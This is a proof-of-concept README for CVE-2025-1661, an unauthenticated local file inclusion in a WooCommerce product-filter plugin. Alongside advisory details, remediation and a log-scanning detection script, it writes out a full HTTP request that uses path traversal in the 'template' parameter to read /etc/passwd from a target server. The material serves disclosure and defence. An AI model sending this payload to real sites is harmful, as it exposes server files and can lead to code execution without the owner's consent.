CVE-2025-1661 PoC — HUSKY – Products Filter Professional for WooCommerce <= 1.3.6.5 - Unauthenticated Local File Inclusion

Associated Vulnerability
Title: HUSKY – Products Filter Professional for WooCommerce <= 1.3.6.5 - Unauthenticated Local File Inclusion (CVE-2025-1661)
Description: The HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.6.5 via the 'template' parameter of the woof_text_search AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
Description
HUSKY – Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion (LFI)
Readme
# CVE-2025-1661 - Unauthenticated Local File Inclusion (LFI) in HUSKY – Products Filter Professional for WooCommerce

## Description

The **HUSKY – Products Filter Professional for WooCommerce** plugin for WordPress is vulnerable to **Local File Inclusion (LFI)** in all versions up to and including **1.3.6.5** via the `template` parameter of the `woof_text_search` AJAX action. 

This allows **unauthenticated attackers** to include and execute arbitrary files on the server, potentially leading to:

- **Bypassing access controls**
- **Extracting sensitive data**
- **Remote Code Execution (RCE)** if certain conditions are met (e.g., upload of "safe" file types)

## Severity: **Critical**

- **CVSS Score:** 9.8 (**Critical**) 
- **CWE ID:** CWE-22 (Path Traversal)
- **EPSS Score:** 0.00061

## Affected Versions

- **Vulnerable:** `<= 1.3.6.5`
- **Patched Version:** `1.3.6.6`

## Remediation

Update to version **1.3.6.6** or a newer patched version.

---

## Proof of Concept (PoC)

### Steps to Reproduce

1. Visit the target website.
2. Capture the request using **Burp Suite**.
3. Modify the request method to **POST** and add the following payload:

```http
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

action=woof_text_search&
```

![IntercomVulnChecker Screenshot](lfi.png)

4. If successful, the server will return the contents of `/etc/passwd`.
5. This can be used to extract other sensitive files from the server.
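
For defenders, the request above leaves a recognizable trace: the `template` value sits in the query string of `/wp-admin/admin-ajax.php`, while `action=woof_text_search` travels in the POST body and is usually absent from access logs. The following detection sketch is an added example, not part of the original README or the plugin; the function names, the combined log format, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+)\s+HTTP/[\d.]+" (?P<status>\d{3})'
)

def suspicious_template(value):
    """Return why a decoded 'template' value escapes a template directory, or None.

    Assumption: legitimate values are plain relative names without '..'.
    """
    normalized = value.replace("\\", "/")
    if ".." in normalized.split("/"):
        return "parent-directory segment"
    if normalized.startswith("/") or re.match(r"[A-Za-z]:/", normalized):
        return "absolute path"
    return None

def scan(lines):
    """Flag admin-ajax.php requests whose query string carries a suspicious 'template'."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes once, so the check sees the value PHP would see.
        for value in parse_qs(url.query, keep_blank_values=True).get("template", []):
            reason = suspicious_template(value)
            if reason:
                findings.append((m["ip"], int(m["status"]), value, reason))
    return findings

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2025:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Mar/2025:10:00:05 +0000] "POST /wp-admin/admin-ajax.php?template=..%2F..%2F..%2Fetc%2Fpasswd&value=a&min_symbols=1 HTTP/1.1" 200 1843',
    '198.51.100.20 - - [01/Mar/2025:10:01:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512',
    '198.51.100.21 - - [01/Mar/2025:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?template=default&value=shoes&min_symbols=1 HTTP/1.1" 200 734',
    '198.51.100.22 - - [01/Mar/2025:10:03:00 +0000] "GET /docs/page.php?template=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, status, value, reason in scan(SAMPLE_LOG):
        print(f"{ip} status={status} template={value!r} ({reason})")
```

A hit with a 200 status on a site still running `<= 1.3.6.5` deserves follow-up, since the response may have contained the included file; the same predicate can back a WAF or reverse-proxy rule until the update to `1.3.6.6` is in place.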

---

## References

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter/husky-products-filter-professional-for-woocommerce-1365-unauthenticated-local-file-inclusion)
- [WordPress Plugin Code](https://plugins.trac.wordpress.org/browser/woocommerce-products-filter/trunk/ext/by_text/index.php)
- [CVE Report](https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae7b6fc-2120-4573-8b1b-d5422d435fa5?source=cve)

---



## Disclaimer

This PoC is for **educational and research purposes only**. Unauthorized testing against systems without permission is illegal and unethical. Always seek **explicit authorization** before conducting any security testing.